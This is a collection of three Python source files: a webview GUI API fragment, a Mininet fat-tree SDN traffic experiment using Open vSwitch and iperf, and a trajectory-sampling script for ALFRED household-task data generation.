:param text_select: Allow text selection on page. Default is False.
:return: The uid of the created window.
"""
valid_color = r'^#(?:[0-9a-fA-F]{3}){1,2}$'
if not re.match(valid_color, background_color):
raise ValueError('{0} is not a valid hex triplet color'.format(background_color))
# Check if starting up from main thread; if not, wait; finally raise exception
if current_thread().name == 'MainThread':
uid = 'master'
if not _initialized:
_initialize_imports()
localization.update(strings)
else:
uid = 'child_' + uuid4().hex[:8]
if not _webview_ready.wait(5):
raise Exception('Call create_window from the main thread first, and then from subthreads')
_webview_ready.clear() # Make API calls wait while the new window is created
gui.create_window(uid, make_unicode(title), transform_url(url),
width, height, resizable, fullscreen, min_size, confirm_quit,
background_color, debug, js_api, text_select, _webview_ready)
if uid == 'master':
_webview_ready.clear()
else:
return uid
@_api_call
def create_file_dialog(dialog_type=OPEN_DIALOG, directory='', allow_multiple=False, save_filename='', file_types=()):
"""
Create a file dialog
:param dialog_type: Dialog type: open file (OPEN_DIALOG), save file (SAVE_DIALOG), open folder (OPEN_FOLDER). Default
is open file.
:param directory: Initial directory
:param allow_multiple: Allow multiple selection. Default is false.
:param save_filename: Default filename for save file dialog.
:param file_types: Allowed file types in open file dialog. Should be a tuple of strings in the format:
filetypes = ('Description (*.extension[;*.extension[;...]])', ...)
:return: A tuple of selected files, None if cancelled.
"""
if type(file_types) != tuple and type(file_types) != list:
raise TypeError('file_types must be a tuple of strings')
for f in file_types:
parse_file_type(f)
if not os.path.exists(directory):
directory = ''
return gui.create_file_dialog(dialog_type, directory, allow_multiple, save_filename, file_types)
@_api_call
def load_url(url, uid='master'):
"""
Load a new URL into a previously created WebView window. This function must be invoked after WebView windows is
created with create_window(). Otherwise an exception is thrown.
:param url: url to load
:param uid: uid of the target instance
"""
gui.load_url(url, uid)
@_api_call
def load_html(content, base_uri=base_uri(), uid='master'):
"""
Load a new content into a previously created WebView window. This function must be invoked after WebView windows is
created with create_window(). Otherwise an exception is thrown.
:param content: Content to load.
:param base_uri: Base URI for resolving links. Default is the directory of the application entry point.
:param uid: uid of the target instance
"""
content = make_unicode(content)
gui.load_html(content, base_uri, uid)
@_api_call
def load_css(stylesheet, uid='master'):
code = css.src % stylesheet.replace('\n', '').replace('\r', '').replace('"', "'")
gui.evaluate_js(code, uid)
@_api_call
def set_title(title, uid='master'):
"""
Sets a new title of the window
"""
gui.set_title(title, uid)
@_api_call
def get_current_url(uid='master'):
"""
Get the URL currently loaded in the target webview
:param uid: uid of the target instance
"""
return gui.get_current_url(uid)
@_api_call
def destroy_window(uid='master'):
"""
Destroy a web view window
:param uid: uid of the target instance
"""
gui.destroy_window(uid)
@_api_call
def toggle_fullscreen(uid='master'):
"""
Toggle fullscreen mode
:param uid: uid of the target instance
"""
gui.toggle_fullscreen(uid)
@_api_call
def set_window_size(width, height, uid='master'):
"""
Set Window Size
:param width: desired width of target window
:param height: desired height of target window
:param uid: uid of the target instance
"""
gui.set_window_size(width, height, uid)
@_api_call
def evaluate_js(script, uid='master'):
"""
Evaluate given JavaScript code and return the result
:param script: The JavaScript code to be evaluated
:param uid: uid of the target instance
:return: Return value of the evaluated code
"""
escaped_script = 'JSON.stringify(eval("{0}"))'.format(escape_string(script))
return gui.evaluate_js(escaped_script, uid)
def window_exists(uid='master'):
"""
Check whether a webview with the given UID is up and running
:param uid: uid of the target instance
:return: True if the window exists, False otherwise
"""
try:
get_current_url(uid)
return True
except:
return False
def webview_ready(timeout=None):
"""
:param delay: optional timeout
:return: True when the last opened window is ready. False if the timeout is reached, when the timeout parameter is provided.
Until then blocks the calling thread.
"""
return _webview_ready.wait(timeout)
def _js_bridge_call(uid, api_instance, func_name, param):
def _call():
result = json.dumps(function(func_params))
code = 'window.pywebview._returnValues["{0}"] = {{ isSet: true, value: {1}}}'.format(func_name, escape_line_breaks(result))
evaluate_js(code, uid)
function = getattr(api_instance, func_name, None)
if function is not None:
try:
func_params = param if not param else json.loads(param)
t = Thread(target=_call)
t.start()
except Exception as e:
logger.exception('Error occurred while evaluating function {0}'.format(func_name))
else:
logger.error('Function {}() does not exist'.format(func_name))
|
fattree4.py
|
# Copyright (C) 2016 Huang MaChi at Chongqing University
# of Posts and Telecommunications, China.
# Copyright (C) 2016 Li Cheng at Beijing University of Posts
# and Telecommunications. www.muzixing.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import signal
import sys
from ryu.app.experiments.readfile import readIpeers
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.cli import CLI
from mininet.log import setLogLevel
from mininet.link import Link, Intf, TCLink
from mininet.topo import Topo
import random
from subprocess import Popen
from multiprocessing import Process
import time
from threading import Thread
import logging
import os
parentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, parentdir)
parser = argparse.ArgumentParser(description="Parameters importation")
parser.add_argument('--k', dest='k', type=int, default=4, choices=[4, 8], help="Switch fanout number")
parser.add_argument('--duration', dest='duration', type=int, default=60, help="Duration (sec) for each iperf traffic generation")
parser.add_argument('--dir', dest='output_dir', help="Directory to store outputs")
parser.add_argument('--cpu', dest='cpu', type=float, default=1.0, help='Total CPU to allocate to hosts')
args = parser.parse_args()
def _set_ovs_protocol_13(sw_list):
for sw in sw_list:
cmd = "sudo ovs-vsctl set bridge %s protocols=OpenFlow13" % sw
os.system(cmd)
class Fattree(Topo):
"""
Class of Fattree Topology.
"""
CoreSwitchList = []
AggSwitchList = []
EdgeSwitchList = []
HostList = []
def __init__(self, k, density):
self.pod = k
self.density = density
self.iCoreLayerSwitch = (k/2)**2
self.iAggLayerSwitch = k*k/2
self.iEdgeLayerSwitch = k*k/2
self.iHost = self.iEdgeLayerSwitch * density
# Init Topo
Topo.__init__(self)
def createNodes(self):
self.createCoreLayerSwitch(self.iCoreLayerSwitch)
self.createAggLayerSwitch(self.iAggLayerSwitch)
self.createEdgeLayerSwitch(self.iEdgeLayerSwitch)
self.createHost(self.iHost)
# Create Switch and Host
def _addSwitch(self, number, level, switch_list):
"""
Create switches.
"""
for i in xrange(1, number+1):
PREFIX = str(level) + "00"
if i >= 10:
PREFIX = str(level) + "0"
switch_list.append(self.addSwitch(PREFIX + str(i)))
def createCoreLayerSwitch(self, NUMBER):
self._addSwitch(NUMBER, 1, self.CoreSwitchList)
def createAggLayerSwitch(self, NUMBER):
self._addSwitch(NUMBER, 2, self.AggSwitchList)
def createEdgeLayerSwitch(self, NUMBER):
self._addSwitch(NUMBER, 3, self.EdgeSwitchList)
def createHost(self, NUMBER):
"""
Create hosts.
"""
for i in xrange(1, NUMBER+1):
if i >= 100:
PREFIX = "h"
elif i >= 10:
PREFIX = "h0"
else:
PREFIX = "h00"
self.HostList.append(self.addHost(PREFIX + str(i), cpu=1.0/NUMBER))
def createLinks(self, bw_c2a, bw_a2e, bw_e2h):
"""
Add network links.
"""
# Core to Agg
end = self.pod/2
for x in xrange(0, self.iAggLayerSwitch, end):
for i in xrange(0, end):
for j in xrange(0, end):
self.addLink(
self.CoreSwitchList[i*end+j],
self.AggSwitchList[x+i],
bw=bw_c2a, max_queue_size=1000) # use_htb=False
# Agg to Edge
for x in xrange(0, self.iAggLayerSwitch, end):
for i in xrange(0, end):
for j in xrange(0, end):
self.addLink(
self.AggSwitchList[x+i], self.EdgeSwitchList[x+j],
bw=bw_a2e, max_queue_size=1000) # use_htb=False
# Edge to Host
for x in xrange(0, self.iEdgeLayerSwitch):
for i in xrange(0, self.density):
self.addLink(
self.EdgeSwitchList[x],
self.HostList[self.density * x + i],
bw=bw_e2h, max_queue_size=1000) # use_htb=False
def set_ovs_protocol_13(self,):
"""
Set the OpenFlow version for switches.
"""
_set_ovs_protocol_13(self.CoreSwitchList)
_set_ovs_protocol_13(self.AggSwitchList)
_set_ovs_protocol_13(self.EdgeSwitchList)
def set_host_ip(net, topo):
hostlist = []
for k in xrange(len(topo.HostList)):
hostlist.append(net.get(topo.HostList[k]))
i = 1
j = 1
for host in hostlist:
host.setIP("10.%d.0.%d" % (i, j))
j += 1
if j == topo.density+1:
j = 1
i += 1
def create_subnetList(topo, num):
"""
Create the subnet list of the certain Pod.
"""
subnetList = []
remainder = num % (topo.pod/2)
if topo.pod == 4:
if remainder == 0:
subnetList = [num-1, num]
elif remainder == 1:
subnetList = [num, num+1]
else:
pass
elif topo.pod == 8:
if remainder == 0:
subnetList = [num-3, num-2, num-1, num]
elif remainder == 1:
subnetList = [num, num+1, num+2, num+3]
elif remainder == 2:
subnetList = [num-1, num, num+1, num+2]
elif remainder == 3:
subnetList = [num-2, num-1, num, num+1]
else:
pass
else:
pass
return subnetList
def install_proactive(net, topo):
"""
Install proactive flow entries for switches.
"""
# Edge Switch
for sw in topo.EdgeSwitchList:
num = int(sw[-2:])
# Downstream.
for i in xrange(1, topo.density+1):
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,arp, \
nw_dst=10.%d.0.%d,actions=output:%d'" % (sw, num, i, topo.pod/2+i)
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,ip, \
nw_dst=10.%d.0.%d,actions=output:%d'" % (sw, num, i, topo.pod/2+i)
os.system(cmd)
# Upstream.
# Install group entries.
if topo.pod == 4:
cmd = "ovs-ofctl add-group %s -O OpenFlow13 \
'group_id=1,type=select,bucket=output:1,bucket=output:2'" % sw
elif topo.pod == 8:
cmd = "ovs-ofctl add-group %s -O OpenFlow13 \
'group_id=1,type=select,bucket=output:1,bucket=output:2,\
bucket=output:3,bucket=output:4'" % sw
else:
pass
os.system(cmd)
# Install flow entries.
Edge_List = [i for i in xrange(1, 1 + topo.pod ** 2 / 2)]
for i in Edge_List:
if i != num:
for j in xrange(1, topo.pod / 2 + 1):
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 'table=0,priority=10,ip,nw_proto=1,nw_src=10.%d.0.%d,actions=group:1'" % (
sw, num, j)
os.system(cmd)
for k in xrange(1, topo.pod / 2 + 1):
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,arp,\
nw_src=10.%d.0.%d,nw_dst=10.%d.0.%d,actions=group:1'" % (sw, num, j, i, k)
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,ip,\
nw_src=10.%d.0.%d,nw_dst=10.%d.0.%d,actions=group:1'" % (sw, num, j, i, k)
os.system(cmd)
# Aggregate Switch
for sw in topo.AggSwitchList:
num = int(sw[-2:])
subnetList = create_subnetList(topo, num)
# Downstream.
k = 1
for i in subnetList:
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,arp, \
nw_dst=10.%d.0.0/16, actions=output:%d'" % (sw, i, topo.pod/2+k)
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,ip, \
nw_dst=10.%d.0.0/16, actions=output:%d'" % (sw, i, topo.pod/2+k)
os.system(cmd)
k += 1
# Upstream.
if topo.pod == 4:
cmd = "ovs-ofctl add-group %s -O OpenFlow13 \
'group_id=1,type=select,bucket=output:1,bucket=output:2'" % sw
elif topo.pod == 8:
cmd = "ovs-ofctl add-group %s -O OpenFlow13 \
'group_id=1,type=select,bucket=output:1,bucket=output:2,\
bucket=output:3,bucket=output:4'" % sw
else:
pass
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,priority=10,arp,actions=group:1'" % sw
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,priority=10,ip,actions=group:1'" % sw
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,priority=10,ip,nw_proto=1 actions=group:1'" % sw
os.system(cmd)
# Core Switch
for sw in topo.CoreSwitchList:
j = 1
k = 1
for i in xrange(1, len(topo.EdgeSwitchList)+1):
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,arp, \
nw_dst=10.%d.0.0/16, actions=output:%d'" % (sw, i, j)
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 \
'table=0,idle_timeout=0,hard_timeout=0,priority=10,ip, \
nw_dst=10.%d.0.0/16, actions=output:%d'" % (sw, i, j)
os.system(cmd)
cmd = "ovs-ofctl add-flow %s -O OpenFlow13 'table=0,idle_timeout=0,hard_timeout=0,priority=10,ip,nw_proto=1,nw_dst=10.%d.0.0/16,actions=output:%d'" % (sw, i, j)
os.system(cmd)
k += 1
if k == topo.pod/2 + 1:
j += 1
k = 1
def monitor_devs_ng(fname="./txrate.txt", interval_sec=0.1):
"""
Use bwm-ng tool to collect interface transmit rate statistics.
bwm-ng Mode: rate;
interval time: 1s.
"""
cmd = "sleep 1; bwm-ng -t %s -o csv -u bits -T rate -C ',' > %s" % (interval_sec * 1000, fname)
Popen(cmd, shell=True).wait()
def traffic_generation1(net,flows_peers,ping_peers):
"""
Generate traffics and test the performance of the network.
"""
# 1.Start iperf. (Elephant flows)
# Start the servers.
serversList = set([peer[1] for peer in flows_peers])
for server in serversList:
# filename = server[1:]
server = net.get(server)
# server.cmd("iperf -s > %s/%s &" % (args.output_dir, 'server'+filename+'.txt'))
server.cmd("iperf -s > /dev/null &") # Its statistics is useless, just throw away.
time.sleep(3)
# Start the clients.
for src, dest in flows_peers:
time.sleep(1)
server = net.get(dest)
client = net.get(src)
client.cmd("iperf -c %s -t %d -M 1250 > /dev/null &" % (server.IP(), 3000))
pingTest(net,ping_peers)
time.sleep(30)
monitor = Process(target=monitor_devs_ng, args=('%s/bwmng.txt' % args.output_dir, 1.0))
monitor.start()
# client.cmd("iperf -c %s -t %d -M 1250 > /dev/null &" % (server.IP(), 2500) ) # Its statistics is useless, just throw away. 1990 just means a great
# client.cmd("iperf -c %s -t %d -M 1250 > /dev/null &" % (server.IP(), random.randint(10,60)))
# time.sleep(1)
# monitor = Process(target = monitor_devs_ng, args = ('%s/bwmng.txt' % args.output_dir, 1.0))
# Wait for the traffic to become stable.
# 3. The experiment is going on.
time.sleep(args.duration + 5)
monitor.terminate()
def traffic_generation(net,flows_peers,monitor1,monitor):
"""
Generate traffics and test the performance of the network.
"""
# 1.Start iperf. (Elephant flows)
# Start the servers.
serversList = set([peer[1] for peer in flows_peers])
for server in serversList:
# filename = server[1:]
server = net.get(server)
# server.cmd("iperf -s > %s/%s &" % (args.output_dir, 'server'+filename+'.txt'))
server.cmd("iperf -s > /dev/null &") # Its statistics is useless, just throw away.
time.sleep(3)
# Start the clients.
monitor1.start()
for src, dest in flows_peers:
time.sleep(1)
server = net.get(dest)
client = net.get(src)
Thread(target=iperfC,args=(client,server.IP(),3000,)).start()
# client.cmd("iperf -c %s -t %d -M 1250 > /dev/null &" % (server.IP(), 2500) ) # Its statistics is useless, just throw away. 1990 just means a great
# client.cmd("iperf -c %s -t %d -M 1250 > /dev/null &" % (server.IP(), random.randint(10,60)))
time.sleep(60)
monitor.start()
# monitor = Process(target = monitor_devs_ng, args = ('%s/bwmng.txt' % args.output_dir, 1.0))
# Wait for the traffic to become stable.
# 3. The experiment is going on.
time.sleep(args.duration + 5)
monitor.terminate()
monitor1.terminate()
def iperfC(client,ip,time):
client.cmd("iperf -c %s -t %d -M 1250 > /dev/null &" % (ip, time))
def iperfTest(net, topo):
"""
Start iperf test.
"""
h001, h015, h016 = net.get(
topo.HostList[0], topo.HostList[14], topo.HostList[15])
# iperf Server
h001.popen('iperf -s -u -i 1 > iperf_server_differentPod_result', shell=True)
# iperf Server
h015.popen('iperf -s -u -i 1 > iperf_server_samePod_result', shell=True)
# iperf Client
h016.cmdPrint('iperf -c ' + h001.IP() + ' -u -t 10 -i 1 -b 10m')
h016.cmdPrint('iperf -c ' + h015.IP() + ' -u -t 10 -i 1 -b 10m')
def pingTest(net,flows_peers):
"""
Start ping test.
"""
count = 0
for src, dst in flows_peers:
count += 1
server = net.get(dst)
client = net.get(src)
# client.cmd('ping %s -c %d > %s/pingTest/ping_%s_%s_%d &' % (server.IP(), 60, args.output_dir, src, dst, count))
client.cmd('ping -c %d -i 0.1 -n -q %s>> %s/%s &' % (args.duration,server.IP(), args.output_dir,'successive_packets.txt'))
time.sleep(random.random())
def createTopo(pod, density, ip="192.168.16.137", port=6653, bw_c2a=100, bw_a2e=100, bw_e2h=100):
"""
Create network topology and run the Mininet.
"""
iperfPath = '/home/lee/ryu2/ryu/app/experiments/iperf_peers.txt'
pingPath = '/home/lee/ryu2/ryu/app/experiments/ping_test.txt'
# lossPath = '/home/lee/ryu2/ryu/app/experiments/link_loss.txt'
iperf_peers = readIpeers(iperfPath)
ping_peers = readIpeers(pingPath)
# loss = readIpeers(lossPath)
time.sleep(2)
topo = Fattree(pod, density)
topo.createNodes()
topo.createLinks(bw_c2a=bw_c2a, bw_a2e=bw_a2e, bw_e2h=bw_e2h)
# Start Mininet.
CONTROLLER_IP = ip
CONTROLLER_PORT = port
net = Mininet(topo=topo, link=TCLink, controller=None, autoSetMacs=True)
net.addController(
'controller', controller=RemoteController,
ip=CONTROLLER_IP, port=CONTROLLER_PORT)
net.start()
# Set OVS's protocol as OF13.
topo.set_ovs_protocol_13()
# Set hosts IP addresses.
set_host_ip(net, topo)
# Install proactive flow entries
install_proactive(net, topo)
# dumpNodeConnections(net.hosts)
# pingTest(net)
# iperfTest(net, topo)
k_paths = args.k ** 2 / 4
fanout = args.k
Controller_Ryu = Popen(
"ryu-manager --observe-links ./Hedera/Hedera.py --k_paths=%d --weight=bw --fanout=%d" % (k_paths, fanout),
shell=True, preexec_fn=os.setsid)
# Wait until the controller has discovered network topology.
time.sleep(60)
# monitor1 = Process(target=pingTest, args=(net, ping_peers))
# monitor = Process(target=monitor_devs_ng, args=('%s/bwmng.txt' % args.output_dir, 1.0))
# 3. Generate traffics and test the performance of the network.
# traffic_generation(net,iperf_peers,monitor1,monitor)
traffic_generation1(net, iperf_peers, ping_peers)
os.system('killall ping')
os.system('killall iperf')
# Stop the controller
# CLI(net)
os.killpg(Controller_Ryu.pid, signal.SIGKILL)
net.stop()
if __name__ == '__main__':
setLogLevel('info')
if os.getuid() != 0:
logging.debug("You are NOT root")
elif os.getuid() == 0:
createTopo(4, 2)
# createTopo(8, 4)
|
sample_augmentation_trajectories.py
|
'''Sample partial/full trajectories starting from a list of previously failed tasks.'''
import os
import sys
sys.path.append(os.path.join(os.environ['ALFRED_ROOT']))
sys.path.append(os.path.join(os.environ['ALFRED_ROOT'], 'gen'))
import time
import multiprocessing as mp
import subprocess
import json
import random
import shutil
import argparse
import numpy as np
import progressbar
import pandas as pd
from collections import OrderedDict
from datetime import datetime
import constants
from constants_scene_nums import VALID_UNSEEN_SCENES, TEST_SEEN_SCENES, TEST_UNSEEN_SCENES
from env.thor_env import ThorEnv
from agents.deterministic_planner_agent import DeterministicPlannerAgent
from game_states.task_game_state_full_knowledge import TaskGameStateFullKnowledge
from utils.video_util import VideoSaver
# params
RAW_IMAGES_FOLDER = 'raw_images/'
DATA_JSON_FILENAME = 'traj_data.json'
# video saver
video_saver = VideoSaver()
# structures to help with constraint enforcement.
goal_to_required_variables = {"pick_and_place_simple": {"pickup", "receptacle", "scene"},
"pick_two_obj_and_place": {"pickup", "receptacle", "scene"},
"look_at_obj_in_light": {"pickup", "receptacle", "scene"},
"pick_clean_then_place_in_recep": {"pickup", "receptacle", "scene"},
"pick_heat_then_place_in_recep": {"pickup", "receptacle", "scene"},
"pick_cool_then_place_in_recep": {"pickup", "receptacle", "scene"},
"pick_and_place_with_movable_recep": {"pickup", "movable", "receptacle", "scene"}}
goal_to_pickup_type = {'pick_heat_then_place_in_recep': 'Heatable',
'pick_cool_then_place_in_recep': 'Coolable',
'pick_clean_then_place_in_recep': 'Cleanable'}
goal_to_receptacle_type = {'look_at_obj_in_light': "Toggleable"}
goal_to_invalid_receptacle = {'pick_heat_then_place_in_recep': {'Microwave'},
'pick_cool_then_place_in_recep': {'Fridge'},
'pick_clean_then_place_in_recep': {'SinkBasin'},
'pick_two_obj_and_place': {'CoffeeMachine', 'ToiletPaperHanger', 'HandTowelHolder'}}
scene_id_to_objs = {}
obj_to_scene_ids = {}
scenes_for_goal = {g: [] for g in constants.GOALS}
scene_to_type = {}
def save_video():
images_path = constants.save_path + '*.png'
video_path = os.path.join(constants.save_path.replace(RAW_IMAGES_FOLDER, ''), 'video.mp4')
video_saver.save(images_path, video_path)
def setup_data_dict():
constants.data_dict = OrderedDict()
constants.data_dict['task_id'] = ""
constants.data_dict['task_type'] = ""
constants.data_dict['scene'] = {'floor_plan': "", 'random_seed': -1, 'scene_num': -1, 'init_action': [],
'object_poses': [], 'dirty_and_empty': None, 'object_toggles': []}
constants.data_dict['plan'] = {'high_pddl': [], 'low_actions': []}
constants.data_dict['images'] = []
constants.data_dict['template'] = {'task_desc': "", 'high_descs': []}
constants.data_dict['pddl_params'] = {'object_target': -1, 'object_sliced': -1,
'parent_target': -1, 'toggle_target': -1,
'mrecep_target': -1}
constants.data_dict['dataset_params'] = {'video_frame_rate': -1}
constants.data_dict['pddl_state'] = []
def dump_data_dict():
data_save_path = constants.save_path.replace(RAW_IMAGES_FOLDER, '')
with open(os.path.join(data_save_path, DATA_JSON_FILENAME), 'w') as fp:
json.dump(constants.data_dict, fp, sort_keys=True, indent=4)
def delete_save(in_parallel):
'''
Delete all collected images in save directory. Used in debug runs.
in_parallel: boolean. If using multiple processes and another processes is attempting this task,
don't delete.
'''
save_folder = constants.save_path.replace(RAW_IMAGES_FOLDER, '')
if os.path.exists(save_folder):
try:
shutil.rmtree(save_folder)
except OSError as e:
if in_parallel: # another process succeeded at this task while this one failed.
return False
else:
raise e # if we're not running in parallel, this is an actual.
return True
def make_task_name(task_tuple):
gtype, pickup_obj, movable_obj, receptacle_obj, scene_num = task_tuple
# e.g. 'pick_two_obj_and_place-Watch-None-Dresser-301'
return '%s-%s-%s-%s-%s' % (gtype, pickup_obj, movable_obj, receptacle_obj, scene_num)
def create_dirs(task_name, seed, obj_repeat):
'''
create dir like
<args.save_path>/pick_two_obj_and_place-Watch-None-Dresser-301/trial_T20200609_122157_214995
'''
task_id = 'trial_T' + datetime.now().strftime("%Y%m%d_%H%M%S_%f")
task_name_task_id = f'{task_name}/{task_id}/'
constants.save_path = os.path.join(constants.DATA_SAVE_PATH, task_name_task_id, RAW_IMAGES_FOLDER)
if not os.path.exists(constants.save_path):
os.makedirs(constants.save_path)
print("Saving images to: " + constants.save_path)
return task_id
def save_bookkeeping_and_splits(task_name, save_path, splits_dir, traj_dirs, errors, process_i=None):
'''
save successful and failed path strings to file.
save error type and counts to file.
'''
thread_suffix = f'_{process_i}' if process_i is not None else ''
# flatten to a list of success paths
success_traj_dirs = []
# make raw split file for nex step in pipeline -- object state collection
split_entries = []
for seed_key in traj_dirs['successes']:
success_traj_dirs.append(traj_dirs['successes'][seed_key])
split_entries.append({'task':'/'.join(traj_dirs['successes'][seed_key].split('/')[-3:-1])})
os.makedirs(os.path.join(save_path, 'pipeline_logs'), exist_ok=True)
# save flat list of successful paths
path_successes = os.path.join(
save_path, 'pipeline_logs', f'{task_name}_success_dirs_T{constants.TIME_NOW}{thread_suffix}.json'
)
with open(path_successes, 'w') as f:
json.dump(success_traj_dirs, f)
# save dictionary with both success and fails, along with their seeds.
path_samp_res = os.path.join(
save_path, 'pipeline_logs', f'{task_name}_sampled_traj_dirs_T{constants.TIME_NOW}{thread_suffix}.json'
)
with open(path_samp_res, 'w') as f:
json.dump(traj_dirs, f)
# save dictionary with errors and their counts
if process_i is not None:
path_errors = os.path.join(
save_path, 'pipeline_logs', f'{task_name}_errors_T{constants.TIME_NOW}{thread_suffix}.json'
)
with open(path_errors, 'w') as f:
json.dump(errors, f)
else:
path_errors = os.path.join(save_path, 'pipeline_logs', f'errors_T{constants.TIME_NOW}.json')
with open(path_errors, 'w') as f:
json.dump({task_name: errors}, f)
# save to raw split file
split_path = os.path.join(splits_dir, f'demo_T{constants.TIME_NOW}{thread_suffix}_raw.json')
with open(split_path, 'w') as f:
json.dump({'augmentation':split_entries}, f)
def merge_process_results(args):
'''merge results from multiple threads, they may or may not be working on the same task tuples'''
# Merge splits
merge_split = {'augmentation':[]}
output_split_path = os.path.join(args.splits_dir, f'demo_T{constants.TIME_NOW}_raw.json')
for process_i in range(args.num_processes):
thread_split_path = output_split_path.replace('_raw', f'_{process_i}_raw')
with open(thread_split_path, 'r') as f:
merge_split['augmentation'] += json.load(f)['augmentation']
os.remove(thread_split_path)
with open(output_split_path, 'w') as f:
json.dump(merge_split, f)
print('\nSaved output split for full success, complete (NOT partial) tasks to :', output_split_path)
# Merge error counts
# identify all the task names
task_names = []
for root, dirs, files in os.walk(constants.DATA_SAVE_PATH):
for d in dirs:
if d.count('-') == 4:
task_names.append(d)
task_names = set(task_names)
print('Task names from threads:', task_names)
merge_errors = {}
output_errors_path = os.path.join(constants.DATA_SAVE_PATH, 'pipeline_logs', f'errors_T{constants.TIME_NOW}.json')
for task_name in task_names:
merge_errors[task_name] = {}
for process_i in range(args.num_processes):
thread_errors_path = os.path.join(
constants.DATA_SAVE_PATH, f'{task_name}_errors_T{constants.TIME_NOW}_{process_i}.json'
)
if os.path.exists(thread_errors_path):
with open(thread_errors_path, 'r') as f:
thread_errors = json.load(f)
print(f'thread {process_i}:')
for k in thread_errors.keys():
print(f'{k} \t\t\t\t{thread_errors[k]}')
if k not in merge_errors[task_name].keys():
merge_errors[task_name][k] = 0
merge_errors[task_name][k] += thread_errors[k]
with open(output_errors_path, 'w') as f:
json.dump(merge_errors, f)
print('Saved error logs to :', output_errors_path)
def count_successes_from_disk(task_tuple):
task_name = make_task_name(task_tuple)
print(task_name)
success_count = 0
# top constants.DATA_SAVE_PATH
for root, dirs, files in os.walk(constants.DATA_SAVE_PATH):
for d in dirs:
if d.count('-') == 4 and d == task_name:
for _root, _dirs, _files in os.walk(os.path.join(constants.DATA_SAVE_PATH, d)):
for _d in _dirs:
for __root, __dirs, __files in os.walk(os.path.join(constants.DATA_SAVE_PATH, d, _d)):
if 'video.mp4' in __files:
success_count += 1
break
return success_count
def sample_task_trajs(
args, task_tuple, agent, env, obj_to_scene_ids,
scene_id_to_objs, pickup_candidates, add_requirements={}):
'''
Sample trajectory according to task tuple, save to disk location.
task_spec: tuple( str(goal_type), str(pickup object type),
str(movable receptacle object type),str(receptacle object type), int(scene number)
).
Example: ('pick_two_obj_and_place', 'Watch', 'None', 'Dresser', 205)
add_requirements: optional dict. Example: {'obj_repeat':3, 'seed':42}
'''
print("Force Unsave Success Data: %s" % str(args.force_unsave_successes))
# scene_num is an integer
gtype, pickup_obj, movable_obj, receptacle_obj, scene_num = task_tuple
print(f'Task: {task_tuple}')
# success and failure book-keeping
# k=error type, v=int count
errors = {}
# k=seed, v=traj dir path
sampled_traj_dirs = {'successes':{}, 'fails':{}}
# try multiple times
target_remaining = args.repeats_per_cond - count_successes_from_disk(task_tuple)
tries_remaining = args.trials_before_fail
num_place_fails = 0
# set random seeds -- determines room object locations and agent start pos
if 'seeds' in add_requirements.keys():
# all trials wil generate the same results!
seeds = add_requirements['seeds']
else:
seeds = [random.randint(0, 2 ** 32) for _ in range(args.trials_before_fail)]
print('SEED = ', seeds)
# optionally specify how 'crowded' the room is with non-task objects
if 'obj_repeat' in add_requirements.keys():
obj_repeat = add_requirements['obj_repeat']
else:
obj_repeat = None
while tries_remaining > 0 :
constants.pddl_goal_type = gtype
print("PDDLGoalType: " + constants.pddl_goal_type)
# determines room agent start pos
seed = seeds.pop()
# e.g. 'pick_two_obj_and_place-Watch-None-Dresser-205'
task_name = make_task_name(task_tuple)
# create task directory to store plan, trajectory json and raw images
# task_id e.g. trial_T20200609_122157_214995
task_id = create_dirs(task_name, seed, obj_repeat)
task_root = constants.save_path.replace('raw_images/', '')
# setup data dictionary for traj.json output
setup_data_dict()
constants.data_dict['task_id'] = task_id
constants.data_dict['task_type'] = constants.pddl_goal_type
constants.data_dict['dataset_params']['video_frame_rate'] = constants.VIDEO_FRAME_RATE
try:
# spawn pickup object instances
# 'repeat', number of instance to spawn for pickup object type
# 'sparse', how much space to free up around receptacle object instance
constraint_objs = {'repeat': [(constants.OBJ_PARENTS[pickup_obj],
np.random.randint(2 if gtype == "pick_two_obj_and_place" else 1,
constants.PICKUP_REPEAT_MAX + 1))],
'sparse': [(receptacle_obj.replace('Basin', ''),
num_place_fails * constants.RECEPTACLE_SPARSE_POINTS)]}
# if task requires, spawn movable receptacle instances
# 'repeat', number of instance to spawn for movable receptacle type,
if movable_obj != "None":
constraint_objs['repeat'].append((movable_obj,
np.random.randint(1, constants.PICKUP_REPEAT_MAX + 1)))
# spawn some more random objects in the scene
# allow only object types listed in scene asset
for obj_type in scene_id_to_objs[str(scene_num)]:
# allow only object types not same as task objects
if (obj_type in pickup_candidates and
obj_type != constants.OBJ_PARENTS[pickup_obj] and obj_type != movable_obj):
if obj_repeat is None:
constraint_objs['repeat'].append(
(obj_type,np.random.randint(1, constants.MAX_NUM_OF_OBJ_INSTANCES + 1)))
else:
constraint_objs['repeat'].append(
(obj_type, obj_repeat))
# make sure there's enough space in microwave, sink, fridge etc if task needs it
if gtype in goal_to_invalid_receptacle:
